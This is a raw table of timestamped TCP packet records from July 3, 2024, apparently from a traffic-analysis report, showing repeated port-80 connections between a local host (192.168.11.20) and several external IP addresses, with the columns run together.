                                                            Jul 3, 2024 17:39:00.828495026 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.828774929 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.923748970 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.923837900 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924052000 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.924093008 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924177885 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.924257994 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.924292088 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924304008 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924325943 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924334049 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924345970 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924355030 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924362898 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924371004 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924424887 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:00.924434900 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924443960 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924451113 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924462080 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924474955 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924484015 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924491882 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924499989 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924508095 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:00.924580097 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:01.042628050 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.042731047 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.042855978 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.042866945 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.042979956 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043107986 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043246031 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043256998 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043266058 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043272972 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043282032 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:01.043320894 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:02.192291021 CEST4981380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:02.310841084 CEST80498133.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:03.221716881 CEST4981480192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:03.340311050 CEST80498143.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:03.340488911 CEST4981480192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:03.353831053 CEST4981480192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:03.472246885 CEST80498143.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:03.495410919 CEST80498143.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:03.495424032 CEST80498143.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:03.495639086 CEST4981480192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:03.499732971 CEST80498143.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:03.499886990 CEST4981480192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:03.502362013 CEST4981480192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:39:03.621068954 CEST80498143.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:39:16.938963890 CEST4981580192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:17.190830946 CEST804981584.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:17.191005945 CEST4981580192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:17.207076073 CEST4981580192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:17.479142904 CEST804981584.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:18.127497911 CEST804981584.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:18.127511978 CEST804981584.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:18.127712011 CEST4981580192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:18.719861031 CEST4981580192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:19.749320984 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:20.005415916 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.005553961 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:20.021413088 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:20.284609079 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.926676989 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.926695108 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.926825047 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:21.531919956 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.563051939 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.809257030 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:22.809402943 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.826396942 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.826476097 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073259115 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.073486090 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073553085 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073599100 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073601007 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.073941946 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324527025 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.324693918 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324707031 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.324744940 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324791908 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324887037 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.325063944 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.595683098 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:24.262131929 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:24.262145042 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:24.262309074 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:24.343873024 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.373061895 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.637356043 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:25.637614012 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.651051998 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.898138046 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555114985 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555211067 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555296898 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555486917 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:26.555486917 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:26.562237024 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:26.809300900 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:41:04.469784975 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:04.588366985 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:04.588613987 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:04.604430914 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:04.723071098 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:04.745064974 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:04.745224953 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:06.118282080 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:06.236877918 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.147705078 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:07.266264915 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.266488075 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:07.282335043 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:07.400875092 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.425645113 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.425884008 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:08.789573908 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:08.908052921 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:09.819084883 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.937704086 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:09.937927008 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.955025911 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.955060005 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.955136061 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.073673964 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.073740005 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.073859930 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.073880911 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.073956966 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074006081 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.074023008 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074075937 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074122906 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074177027 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074182034 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.074225903 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074275970 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074352026 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.074527979 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.092958927 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.093095064 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.192958117 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193015099 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193048000 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193129063 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193130970 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193161011 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193180084 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193227053 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193259001 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193376064 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193401098 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193403959 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193428040 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193519115 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193547964 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193568945 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193640947 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193674088 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193746090 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193865061 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193893909 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194005013 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194119930 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194150925 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194222927 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311764956 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311791897 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311804056 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311913013 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312032938 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312181950 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312288046 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312429905 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312448025 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312463999 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312549114 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312665939 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:11.460804939 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:11.579257011 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.490268946 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.608846903 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.608973980 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.622332096 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.740835905 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.766969919 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.766980886 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.767292023 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.771243095 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.771473885 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.773971081 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.892338037 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:20.923830032 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.054687977 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.054894924 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.068289042 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.199048042 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.202608109 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.203102112 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.203268051 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.210647106 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.341415882 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:26.240961075 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:26.409423113 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:26.409610033 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:26.425379038 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:26.593741894 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:27.581568956 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:27.581583023 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:27.581813097 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:27.941791058 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:28.971082926 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:29.139942884 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:29.140213966 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:29.155994892 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:29.324680090 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:30.329432011 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:30.329516888 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:30.329770088 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:30.659801006 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.689239979 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.857737064 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:31.857918978 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.874810934 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.874834061 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.874917030 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043286085 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043303967 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043379068 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043472052 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043494940 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043580055 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043742895 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043915987 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212057114 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212075949 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212363005 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212369919 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212425947 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212455034 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212488890 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212621927 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212621927 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212811947 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212903976 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.380796909 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.380882978 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.381016016 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.381273985 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:33.375262976 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:33.375281096 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:33.375500917 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:33.377933025 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.407365084 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.576006889 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:34.576159954 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.589607954 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.758238077 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:35.763567924 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:35.763588905 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:35.763932943 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:35.770667076 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:35.939198971 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:40.800242901 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:40.937540054 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:40.937755108 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:40.953568935 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:41.085834980 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:41.092703104 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:41.092715025 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:41.092830896 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:42.469700098 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:43.499341011 CEST4983080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:43.630590916 CEST804983074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:43.630714893 CEST4983080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:43.646683931 CEST4983080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:43.777940035 CEST804983074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:43.791742086 CEST804983074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:43.791755915 CEST804983074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:43.791968107 CEST4983080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:45.156630039 CEST4983080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.186053991 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.318280935 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.318449020 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.335351944 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.335401058 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.335453033 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.467607975 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467700005 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467709064 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467716932 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467824936 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467833996 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467875957 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.467924118 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.467945099 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.467976093 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.468142986 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.468313932 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.600048065 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600120068 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600270987 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.600281954 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600290060 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600321054 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.600399971 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600406885 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600519896 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600541115 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:46.600600004 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600608110 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.600756884 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732515097 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732526064 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732568979 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732733011 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732748032 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732856035 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.732863903 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.733108044 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.733239889 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.738563061 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.738576889 CEST804983174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:46.738733053 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:47.843502045 CEST4983180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:48.872922897 CEST4983280192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:49.004673958 CEST804983274.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:49.004892111 CEST4983280192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:49.018291950 CEST4983280192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:49.149883986 CEST804983274.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:49.156029940 CEST804983274.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:49.156810045 CEST804983274.208.236.230192.168.11.20
